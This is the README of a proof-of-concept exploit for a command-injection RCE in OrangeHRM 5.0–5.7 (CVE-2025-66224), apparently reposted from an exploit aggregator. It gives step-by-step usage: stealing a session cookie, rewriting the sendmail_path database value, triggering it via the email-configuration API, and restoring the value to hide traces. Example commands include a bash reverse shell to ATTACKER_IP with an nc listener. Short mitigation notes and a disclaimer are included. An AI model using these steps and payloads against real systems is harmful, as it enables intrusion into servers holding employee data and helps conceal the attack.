Share
## https://sploitus.com/exploit?id=86ACB05D-000A-5E78-88BD-E9E193AAB184
# OrangeHRM RCE Exploit - CVE-2025-66224
## ๐ Description
This Proof of Concept (PoC) demonstrates a Remote Code Execution (RCE) vulnerability in OrangeHRM through command injection in the `sendmail_path` configuration parameter.
The exploit works by:
1. Injecting a malicious payload into the MySQL database (`hs_hr_config` table)
2. Triggering the payload execution via the email configuration API endpoint
3. Automatically restoring the original value to clean up traces
## ๐ฏ Affected Versions
- OrangeHRM version 5.0 to 5.7
## โ ๏ธ Disclaimer
This tool is provided for **educational and authorized security testing purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse or damage caused by this tool.
## ๐ง Requirements
```bash
pip install requests mysql-connector-python
```
## ๐ฆ Installation
```bash
git clone https://github.com/richard-natan/PoC-CVE-2025-66224
cd PoC-CVE-2025-66224
pip install -r requirements.txt
```
## ๐ Usage
### Step 1: Obtain Session Cookie
1. Log in to OrangeHRM through the web interface
2. Open browser Developer Tools (F12)
3. Navigate to **Storage** > **Cookies** (Firefox) or **Application** > **Cookies** (Chrome)
4. Copy the `_orangehrm` cookie value
### Step 2: Run the Exploit
```bash
python3 exploit.py -t -c \
-dh -du -dp \
-cmd ''
```
### Example - Simple Command
```bash
python3 exploit.py -t http://127.0.0.1:8080/ \
-c "g58tak8pbnheseatv6dggvi31i" \
-dh 172.18.0.2 \
-du orange_user \
-dp orange_password \
-cmd "touch /tmp/pwned"
```
### Example - Reverse Shell
```bash
# Start listener on attacker machine
nc -lvnp 4444
# Execute exploit with reverse shell payload
python3 exploit.py -t http://target.com/ \
-c "your_session_cookie" \
-dh 172.18.0.2 \
-du orange_user \
-dp orange_password \
-cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
## ๐ Parameters
| Parameter | Short | Required | Description |
|-----------|-------|----------|-------------|
| `--target` | `-t` | โ
| Target URL (e.g., http://target.com) |
| `--cookie` | `-c` | โ
| Session cookie value |
| `--cookie_name` | `-cn` | โ | Cookie name (default: _orangehrm) |
| `--command` | `-cmd` | โ
| Command to execute on target |
| `--db_host` | `-dh` | โ
| MySQL host address |
| `--db_user` | `-du` | โ
| MySQL username |
| `--db_pass` | `-dp` | โ
| MySQL password |
| `--db_port` | `-dport` | โ | MySQL port (default: 3306) |
## ๐ How It Works
### Vulnerability Details
The vulnerability exists in the email configuration functionality where the `sendmail_path` parameter is stored in the database and later executed without proper sanitization.
**Exploitation Flow:**
```
1. Authenticate to OrangeHRM (obtain valid session cookie)
โ
2. Connect to MySQL database
โ
3. Locate hs_hr_config table
โ
4. Update email_config.sendmail_path value:
FROM: /usr/sbin/sendmail -bs
TO: /usr/sbin/sendmail -bs && #
โ
5. Trigger execution via API:
PUT /web/index.php/api/v2/admin/email-configuration
โ
6. Command executes on server
โ
7. Restore original value (cleanup)
```
### Technical Details
**Vulnerable Parameter:** `email_config.sendmail_path`
**Database:**
- Table: `hs_hr_config`
- Column: `name` = 'email_config.sendmail_path'
- Column: `value` = sendmail command path
**Trigger Endpoint:**
```
PUT /web/index.php/api/v2/admin/email-configuration
```
## ๐ก๏ธ Mitigation
1. **Input Validation:** Implement strict validation for the `sendmail_path` parameter
2. **Escaping:** Properly escape shell commands before execution
3. **Least Privilege:** Run web server with minimal privileges
4. **Update:** Apply the latest security patches for OrangeHRM
## ๐ค Credits
**PoC by:** RiccK
**Team:** Bypassadores && HackersOnSteroids
## ๐ References
- [CVE-2025-66224](https://nvd.nist.gov/vuln/detail/CVE-2025-66224)
---
**โ ๏ธ Use responsibly. Always obtain proper authorization before testing.**